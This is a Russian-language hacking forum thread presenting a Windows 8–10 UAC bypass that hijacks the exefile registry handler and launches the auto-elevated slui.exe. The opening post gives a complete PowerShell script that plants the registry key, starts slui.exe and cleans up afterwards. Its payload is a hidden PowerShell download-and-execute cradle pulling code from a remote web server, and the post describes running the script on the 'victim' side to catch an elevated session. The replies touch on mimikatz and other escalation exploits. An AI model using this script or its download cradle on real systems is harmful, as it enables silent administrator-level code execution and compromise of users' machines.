Статья Windows LPE (Local Privilege Escalation [Bypas UAC 2018 slui.exe method] )

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
735
2 640
#1
Всем доброго времени суток колеги.
Сегодня речь пойдет об относительно новом способе обхода User Account Control (UAC) и способе (LPE) - поднятия привилегий в системе Windows 8-10 x64 и x86 системах.
PS: Пишу сразу на двух форумах по этому :
CopyRights: <<<MisterBert0ni aka DarkNode>>>

СОДЕРЖАНИЕ СТАТЬИ:
  • Описания работы эксплоита
  • Демонстрация работы эксплоита
  • Вспомним про Web Delivery через PowerShell
  • Вспомним про RegSVR способ подгрузки
  • Похожие эксплоиты
Имя: Slui File Handler Hijak LPE
Дата публикации: 15.01.2018
Целевая ОС: Microsoft Windows
Патч: НЕТУ
Уязвимые версии: Windows 8-10 (x64 и x86)
Для просмотра контента необходимо: Войти или зарегистрироваться


1.png
ПРИНЦИП РАБОТЫ ЭКСПЛОЙТА:

В операционной системе Windows версии 8-10 был обнаружен бинарный файл slui.exe - который является auto-elevated приложением ,так сказать - самоповышаемым.
Это дает возможность использовать обработчик
Для просмотра контента необходимо: Войти или зарегистрироваться
й для хайджекинга в привилегированый процесс.

Простыми словамя говоря:
Мы создаем в реестре Windows запись , которая скажет что при открытии всех *.EXE файлов - будет выполнятся наша команда или вредоносный файл, после чего запускаем slui.exe , соответственно вместо slui.exe запустится наш пейлоад от имени администратора.

Для того чтобы понять как это работает давайте приступим к практической части:
1) Допустим у нас сессия без повышеных привилегий
2.png

2)Соотведственно, для того что бы все это вручную не писать , давайте подготовим простой скрипт для PowerShell:
3.png
Код:
#Out Command | Наш пейлоад в моем случае вектор Web Delivery
$command = "powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://192.168.1.79/')"


#Create Registry KEY | Создаем ключ в реестре для асоциации бинарных файлов и прописываем действие обработчику EXE файлов:

New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force

#Start slui.exe as Admin | Запускаем от имени админа
Start-Process "C:\Windows\System32\slui.exe" -Verb runas


#Remove registry structure | Удаляем асоциацию файлов
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
В качестве вектора атаки я использовал Web Delivery , более подробно о нем я писал ранее в своей статье.
Так же имеет место быть вектор через regsvr32 , и огромное спасибо нашему коллеге @gushmazuko за то что написал готовый скрипт на PowerShell для работы с этим
вектором ,
Для просмотра контента необходимо: Войти или зарегистрироваться


3)После того как мы набросали список действий в наш скрипт - ложим где-то на вебсервер ( в моем случае в условиях учебной практике - это локальная машина )
И запускаем на стороне жертвы тем же Web Delivery методом в моем случае:
4.png

5.png

4) Ловим сессию с повышеными привилегиями:)

7.png

Благодарность : @gushmazuko


Всем спасибо) С вами был DarkNode
Работа regsvr32 вектора покажу в видео)
 
Последнее редактирование:

f1rst

New member
03.04.2017
2
0
#2
Не будет ли подниматься сессия пользователя при открытие любого exe пользователем а не админом?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
735
2 640
#3
Не будет ли подниматься сессия пользователя при открытие любого exe пользователем а не админом?
Нет. В случае с пользователем - запросит пароль администратора. Этот вектор нацелен на обход UAC.
 
Симпатии: Понравилось Vertigo

shArky

Active member
07.01.2017
34
30
#4
Хотелось бы внести небольшие правки в орфографию, не сочтите за грубость, но:
  1. Слово соотвеТственно пишется через Т, а не Д
  2. Слово колЛеге пишется с двумя Л, а не с одной
  3. Слово "где-то" пишется через тире
Далее я уверен, что автор торопился, поэтому у него были некоторые "очепятки":
  1. "подготим" на подготовим
  2. "Свами" раздельно
  3. "смасибо" на спасибо
  4. "говотый" на готовый
  5. "приступи"на приступим
  6. "процес" на процесс
  7. "что бы" в данном случае слитно
Ещё раз извиняюсь, но писать на такую тематику надо грамотно.
Исправляйтесь в следующий статьях, DarkNode!
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
735
2 640
#5
Хотелось бы внести небольшие правки в орфографию, не сочтите за грубость, но:
  1. Слово соотвеТственно пишется через Т, а не Д
  2. Слово колЛеге пишется с двумя Л, а не с одной
  3. Слово "где-то" пишется через тире
Далее я уверен, что автор торопился, поэтому у него были некоторые "очепятки":
  1. "подготим" на подготовим
  2. "Свами" раздельно
  3. "смасибо" на спасибо
  4. "говотый" на готовый
  5. "приступи"на приступим
  6. "процес" на процесс
  7. "что бы" в данном случае слитно
Ещё раз извиняюсь, но писать на такую тематику надо грамотно.
Исправляйтесь в следующий статьях, DarkNode!
Спасибо за поправки) Постараюсь уделить больше внимания )
 
03.05.2017
18
0
#6
Мне всегда непонятно почему обходы UAC называют LPE,это не совсем так,да,это полезно,чтобы там завести мимикатз и тд,но обходы UAC все подразумевают запуск от Привилегированного изначально юзера.Вот ms16-032,это классический эксплойт LPE,запуская от любого пользователя,через повершелл,и через много векторов я получаю NT Authority/SYSTEM,то есть права системы что выше Админа.А обход UAC =обход UAC,и помощь в LPE,но не классическая эскалация привилегий
 

a113

Grey Team
10.12.2016
291
246
#7
Сколько бы не читал статьи, да и комментарии, Dark Node (aka MisterBert0ni :D), не перестаю удивляться хакерскому таланту этого человека.
Огромное спасибо за статьи!
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
735
2 640
#8
Мне всегда непонятно почему обходы UAC называют LPE,это не совсем так,да,это полезно,чтобы там завести мимикатз и тд,но обходы UAC все подразумевают запуск от Привилегированного изначально юзера.Вот ms16-032,это классический эксплойт LPE,запуская от любого пользователя,через повершелл,и через много векторов я получаю NT Authority/SYSTEM,то есть права системы что выше Админа.А обход UAC =обход UAC,и помощь в LPE,но не классическая эскалация привилегий
Совершенно верное замечание. По сути это не LPE ( но тут имеется ввиду повышение привилегий в контексте "От не привилигерованного шелла до привилигерованного"
Это всего лишь базовая демонстрация техники обхода UAC через autoevelated приложения.
Таких приложений на самом деле очень и очень много, например тут можно найти такой список (в грей секшн создал пост с ссылкой)
Куда проще обходить UAC через token impersonation